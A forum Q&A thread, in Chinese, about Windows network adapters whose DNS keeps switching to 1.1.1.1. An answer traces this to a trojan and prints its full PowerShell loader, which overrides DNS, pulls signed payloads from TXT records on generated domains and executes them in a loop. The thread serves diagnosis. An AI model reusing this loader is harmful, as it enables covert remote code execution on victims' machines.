正如标题所述,每当我将网卡设置为通过 DHCP 获取其设置时,几个小时后或第二天我就会意识到多个卡(WiFi、LAN(未物理连接)和 Tailscale 接口)上的设置已将其 DNS 设置更改为手动,并且手动配置的 DNS 始终为 1.1.1.1。
我已经重置了 Windows 网络堆栈(netsh int ip reset),使用不同的防病毒产品扫描了计算机中的恶意软件,但没有任何有意义的结果。
有没有办法记录哪个程序创建了这些更改?有没有人遇到过同样的问题,并且知道有什么软件可以做到这一点?
顺便说一句,我的网络中确实有一个通过 DHCP 分配的 pihole dns 服务器。也许我的机器上有一些软件试图绕过它?
同一网络上的其他计算机(也安装有 Windows 11)没有该问题。
答案1
所以最后它是个木马。当我删除找到的 powershell 文件时,我的杀毒软件发现了它,但有趣的是之前没有。我可以提取的代码如下。不幸的是,我无法找出 powershell 是如何启动的……
.\debug.ps1
'8F628C95-FCF4-411C-B363-B3A21C9D437E';
$env:_v = 'd22062023';
get-wmiobject win32_networkadapter | % { Set-DnsClientServerAddress -InterfaceIndex $_.InterfaceIndex -ServerAddresses ("1.1.1.1","1.0.0.1") -Confirm:$false };
$ms = [IO.MemoryStream]::new();
function Microsoft {
param (
$windows,$linux
)
try {
$dns = Resolve-DnsName -Name $windows -Type 'TXT'
$ms.SetLength(0);
$ms.Position = 0;
foreach ($txt in $dns) {
try {
if ($txt.Type -ne 'TXT') {
continue;
}
$pkt = [string]::Join('', $txt.Strings);
if ($pkt[0] -eq '.') {
$dp = ([type]((([regex]::Matches('trevnoC','.','RightToLeft') | ForEach {$_.value}) -join ''))).GetMethods()[306].Invoke($null, @(($pkt.Substring(1).Replace('_', '+'))));
$ms.Position = [BitConverter]::ToUInt32($dp, 0);
$ms.Write($dp, 4, $dp.Length - 4);
}
}
catch {
}
}
if ($ms.Length -gt 136) {
$ms.Position = 0;
$sig = [byte[]]::new(128);
$timestamp = [byte[]]::new(8);
$buffer = [byte[]]::new($ms.Length - 136);
$ms.Read($sig, 0, 128) | Out-Null;
$ms.Read($timestamp, 0, 8) | Out-Null;
$ms.Read($buffer, 0, $buffer.Length) | Out-Null;
$pubkey = [Security.Cryptography.RSACryptoServiceProvider]::new();
[byte[]]$bytarr = 6,2,0,0,0,164,0,0,82,83,65,49,0,4,0,0,1,0,1,0,171,136,19,139,215,31,169,242,133,11,146,105,79,13,140,88,119,0,2,249,79,17,77,152,228,162,31,56,117,89,68,182,194,170,250,16,3,78,104,92,37,37,9,250,164,244,195,118,92,190,58,20,35,134,83,10,229,114,229,137,244,178,10,31,46,80,221,73,129,240,183,9,245,177,196,77,143,71,142,60,5,117,241,54,2,116,23,225,145,53,46,21,142,158,206,250,181,241,8,110,101,84,218,219,99,196,195,112,71,93,55,111,218,209,12,101,165,45,13,36,118,97,232,193,245,221,180,169
$pubkey.ImportCspBlob($bytarr);
if ($pubkey.VerifyData($buffer, [Security.Cryptography.CryptoConfig]::MapNameToOID('SHA256'), $sig)) {
return @{
timestamp = ([System.BitConverter]::ToUInt64($timestamp, 0));
text = ([Text.Encoding]::UTF8.GetString($buffer));
};
}
}
}
catch {
}
return $null;
}
while ($true) {
try {
$ko = @{
timestamp = 0;
text = '';
};
foreach ($c in (@("eu", "in"))) {
foreach ($a in (@('you','wiki','blog','face','ny'))) {
foreach ($b in (@('arena','store','desk','box','reads','book','times','news','share'))) {
try {
$wowo = "$a$b.$c";
$roro = Microsoft $wowo $wowo;
if ($null -ne $roro) {
if ($roro.timestamp -gt $ko.timestamp) {
$ko = $roro;
}
}
}
catch {
}
}
}
}
if ($ko.text) {
$job = Start-Job -ScriptBlock ([scriptblock]::Create($ko.text));
$job | Wait-Job -Timeout 15500;
$job | Stop-Job;
}
}
catch {
}
Start-Sleep -Seconds 35;
}
QQZeFvgbP : The term 'QQZeFvgbP' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At C:\Users\max\Documents\debug.ps1:3 char:1
+ QQZeFvgbP
+ ~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (QQZeFvgbP:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
JFekEPXxTgh : The term 'JFekEPXxTgh' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. and try again.